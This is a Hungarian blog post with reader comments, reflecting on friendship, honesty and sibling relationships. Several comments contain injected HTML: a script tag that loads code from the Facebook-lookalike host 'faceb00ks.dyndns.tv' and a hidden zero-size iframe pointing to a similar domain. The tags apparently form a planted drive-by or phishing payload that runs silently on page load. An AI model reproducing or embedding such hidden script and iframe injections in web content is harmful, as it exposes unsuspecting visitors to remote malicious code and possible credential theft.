Street Racer STR motoros kesztyű a MotoZemtől

Értelmező kéziszótár

Túl a 3 x-en még mindig vannak szavak amiket vagy én nem értelmezek helyesen vagy mások.Nem tudom,de inkább felsorolom:
Barát:Valaki aki szeret,de nem szerelemmel.Meghallgat,segít,bulizik velem,vigasztal,nem unalmas a társasága sose.Röviden ott van jóban-rosszban velem.Vannak örök életű barátságok vannak rövidebbek.Talán nem is az a lényeg,hogy meddig tart,hanem maga a kapcsolat hangulata.És most itt a hivatalos verzió:http://hu.wikipedia.org/wiki/Barátság
Őszinteség:Talán az egyik legnehezebb viselkedési forma.Az emberek elvárják,hogy legyél őszinte,de ha az vagy általában nem fogadják el vagy csak nem azonnal.Ha őszinte vagy,könnyen lehet,hogy megbántod a másikat,mert kimondasz olyat,amit nem akar hallani,pedig tudja ő is.Sokszor még magunkhoz se vagyunk őszinték,csak a szépre a jóra emlékezünk;nem látjuk,hogy az a másik milyen valójában;tudjuk,hogy valami baj van,de nem vesszük tudomásul.A gyerekeknek is azt tanítják,hogy őszintének kell lenni,de a felnőttek egy nap többet hazudnak,mint sok gyerek egy hónap alatt.
http://hu.wikipedia.org/wiki/Őszinteség
Testvér:Első jelentése ugye a vérszerinti kapcsolatot jelöli.Jó esetben a testvérek jó kapcsolatban vannak,közel áll a barátsághoz a kapcsolatuk,csak eggyel több közük van egymáshoz,mint egy baráttal.Van persze a másik oldal is,amikor a testvér csak meghallja a nevét és már rosszul van,amikor inkább kilépne a családból csak ne kelljen már megint látni.Amikor tudod,hogy ő a legnagyobb irigyed és ellenséged és egy kanál vízben megtudnád fojtani,de nem lehet.Erre a szóra még hivatalos verziót se találtam,talán annyira bonyolult.
És hogy mire ez az egész szótárasdi,?
Milyen barát az,akivel nem lehetsz őszinte,mert megsértődik és hátat fordít?
Milyen testvér az,akivel ha őszinte vagy megharagszik és még másokat is ellened uszít?
És milyen az,amikor a testvér a barátot uszítja ellened,hogy az is forduljon el tőled?
Milyen társ az,aki a másikkal nem őszinte,mert nem akarja megbántani,aztán mikor ez kiderül,ezt vágja a fejéhez először?
Én nem tudok beletörődni,hogy ilyen világot élünk és most ez a normális.Ezek örök értékek és nem kéne így kiszorítani őket.Nem tudom elfogadni,hogy ilyen felületesek lettek az emberek és csak a "máz",a "felszín" a fontos.Mert nagyon is sokat számít a belbecs,csak már egyre kevesebb embert érdekel.Mindenki csak a látszatra ad?Tisztelet a kivételnek!

Hozzászólások

Az egész ott kezdődik,amikor gyerek voltál,és aki akkor szeretett,elfogadott,az ma is ugyanezt teszi. Az én családomban az egykori öt ilyen személyből már csak kettő él...
Az igaz barátok nekem valahogy kimaradtak az életemből,de hogy őszinte legyek,ebben én is lúdas vagyok...
Társ ... egyelőre még csak a kutyáim voltak az igaziak...
 
Jól látod. A legtöbb barátság az őszinteség hiányán bukik el. Hazugságot várunk, mert az őszintétől besérülünk. Emiatt viszont a legtöbb igaz barátság megszűnik igaz barátság lenni, csak megreked a felszínes jópofáskodó haverság szintjén. Pedig ki legyen hozzánk kiméletlenül őszinte, ha nem egy igaz barát???
 
A testvéri kapcsolat azon múlik,a szülők hogy tudják,élét venni a testvéri rivalizálásnak.Fontos,hogy az első szülött fel legyen készítve a testvérszületésre,be legyen vonva,ne azt érezze,le lesz ő cserélve,hanem azt,bővül a mi kis családunk.Ez,kevés helyen sikerül.
Én,még ahány őszinte kapcsolatot szerettem volna,mind megbukott az őszinteségen.Azt szerettem volna,gondolkodtasson el,finoman bíráljon,tartson tükröt,és ezt várja tőlem is.De,nem ment,mert bírálatnak fogta fel az illető. A társ meg talán akkor őszinte,ha szabad neki,és nem fél,hogy a másik megbántódik...talán..Nehéz kérdés.
 
Milyen ember? Gyarló. Az emberség nem könnyű, és mindannyian sok hibát követünk el. A korszellem nem kedvez az emberi közösségeknek és az sem véletlen, hogy az erkölcsi törvények régen "kőbe" voltak vésve. Emlékszünk még rájuk mindannyian, csak nem tartjuk be, azt hívén, semmiféle következménnyel nem jár, ha áthágjuk az örök törvényeket, és csak önmagunk vágy- szenvedélyeinek kielégítéséért élünk. A család adja a legnagyobb feladatot szinte mindannyiunk számára, hiszen olyan köteléket jelent, melyben életünk végéig akár nap, mint nap szembesülhetünk megoldandó feladatainkkal. És ezt piszokul nem szeretjük, mint ahogy azt sem, hogy a szemünkbe mondják az igazat, amit oly' nagy erőfeszítéssel takargatunk magunk elől. Mert a szembe nézéshez, és - ha indokolt - a változtatáshoz erő kell, és adott esetben a képviseltek melletti kitartáshoz is! Sokkal egyszerűbb a másikra mutogatni, őt okolni vagy épp' hibáztatni.
Züllött, erkölcstelen és igaz értékeit veszített világban élünk, és, ha nem akarjuk, hogy ilyen is maradjon, a mi feladatunk, hogy képviseljük a jót, hogy visszaadjuk gyermekeinknek a helyes értékrendet, az erkölcsi, etikai törvényeket, a tisztaságba, jóságba, őszinteségbe vetett hitet. Akkor is tennünk kell, ha szélmalom harcnak tűnik! Lehet, hogy elbukjuk a csatát, de legalább tiszta lesz a lelkiismeretünk: mi megtettük, ami tőlünk telt.:love:
 
Ha már testvér akkor egy húsz éves szünet után is úgy fogad mint annak előtte hiába nőttünk meg. Saját családjára az ember mindig támaszkodhasson - legalábbis ez lenne természetes:joreggelt:
 
Hát erről a testvér meg család dologról tudnék mesélni. De inkább megkíméllek titeket.
 
Hát nekem is vannak hasonló tapasztalataim. Rendszerint világnak szaladnak az őszinte gondolatoktól a népek. De inkább vagyok bunkó és vegyen körül egy kevés őszinte ember, mint egy csomó másféle...
 
Egy kezemen megtudom számolni,hogy hány emberrel lehetek őszinte.Az egyik szerencsére a férjem.A többieknek ha megmondanám mindig az igazat,szerintem nem szólna hozzám senki.:D
 
Lehet, h régen nem így vót, de régen mi is fiatalabbak vótunk, oszt kevesebbet láttunk ebbű. Sajnálom, kitartás! Én is kénytelen vagyok anyám védelmibe apámnak hazudni. Má csak ezér se szerettem vóna családot... majd mesélek... :( :love:
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Család, barát, testvér ... nem könnyű, főleg ha több is van.
Nekem a családból több is van, az első a fiammal alkotott kétszemélyes :), a második a szüleim és a testvérem - persze az ő kis családjával és a párom, a harmadik családom az a kevés ember, akik tényleg a barátaim. A párom családja is valamikor a családom lesz, és a bajok majd akkor kezdődnek igazán :D Sok esetben jobb a választott család, mint az örökölt - szülő/testvér - barátok.
Az őszinteség minden kapcsolatban a legfontosabb lenne, vagy mi, elvégre is ez lenne az alapja. vagy ma már nem? Én őszinteségre neveltem a fiam, de nem mindig kell rögtön a szemébe mondani a másiknak. Vannak pillanatok, amikor fájdalmat okoz vele, és vannak olyanok, amikor meg lehet beszélni. Ha hiányoznak az őszinte beszélgetések, akkor nincs barátság se ...
 
Yama750;bt21057 írta:
Hát nekem is vannak hasonló tapasztalataim. Rendszerint világnak szaladnak az őszinte gondolatoktól a népek. De inkább vagyok bunkó és vegyen körül egy kevés őszinte ember, mint egy csomó másféle...

Nem hiszem, hogy mindig az őszinteség az ami miatt "világgá szaladnak a népek". Az is számít, hogy milyen a stílus. Nem mindig igaz ez, tudom mert van akinek cukorba burkolva se lehetne semmi negatív véleményt elmondani, de részemről így vagyok a dologgal
 
Mely's;bt21071 írta:
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" width="0" height="0"></iframe>Vannak pillanatok, amikor fájdalmat okoz vele, és vannak olyanok, amikor meg lehet beszélni. Ha hiányoznak az őszinte beszélgetések, akkor nincs barátság se ...

Ez is olyan (szerintem.), hogy van a hasznos őszinteség, és van az, aminek semmi értelme, hogy elmondd, mert csak megbántod a másikat, de egyébként semmit nem változtat a dolgokon. Ebbe nem tartozik bele az, hogyha valaki tett valamit és nem akarja vállalni a felelősséget. Remélem valamennyire érthető mire gondolok:)
 
Hm, hát nekem a cukorba csomagolt majmoktól áll a szőr a hátamon. Élvezettel kergetem el őket magamtól, és elvárom, hogy nekem is megmondják a frankót, még ha nem is esik jól. Olyankor van esélyem elgondolkodni azon, hogy lehet valamit rosszul csinálok, és meg kéne a témát máshonnan is közelíteni. "Gecinek lenni nehéz, de megéri."
 
Tévedés ne essék, a durvaság és az őszinteség nem jár együtt. De ha valakinek finoman se lehet megmondani ha hülyeséget csinál, az vessen magára. Jah, és gyűjtögesse csak a talpnyalókat, aztán csodálkozzon, amikor baj van és valójában senki se áll mellette.
Vagy most megint "durván" fogalmaztam?
 
Teljesen egyet értek, azt én sem szeretem, ha valakinek sehogy sem lehet elmondani a majomságát
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Yama750;bt21092 írta:
Tévedés ne essék, a durvaság és az őszinteség nem jár együtt. De ha valakinek finoman se lehet megmondani ha hülyeséget csinál, az vessen magára. Jah, és gyűjtögesse csak a talpnyalókat, aztán csodálkozzon, amikor baj van és valójában senki se áll mellette.
Vagy most megint "durván" fogalmaztam?
Nem fogalmaztál durván, szerintem. Aki talpnyalókat gyűjt maga köré, annak ez fel se tűnne. Egyébként ők csodálkoznak leginkább, ha magukra maradtak a bajban ...
 

Blogbejegyzés információ

Szerző
fneildi
Olvasás
746
Hozzászólások
52
Utolsó frissítés

Tagok Blogjai további bejegyzései

fneildi további bejegyzései

Oszd meg ezt a bejegyzést

CsamShop kendők

Back
Oldal tetejére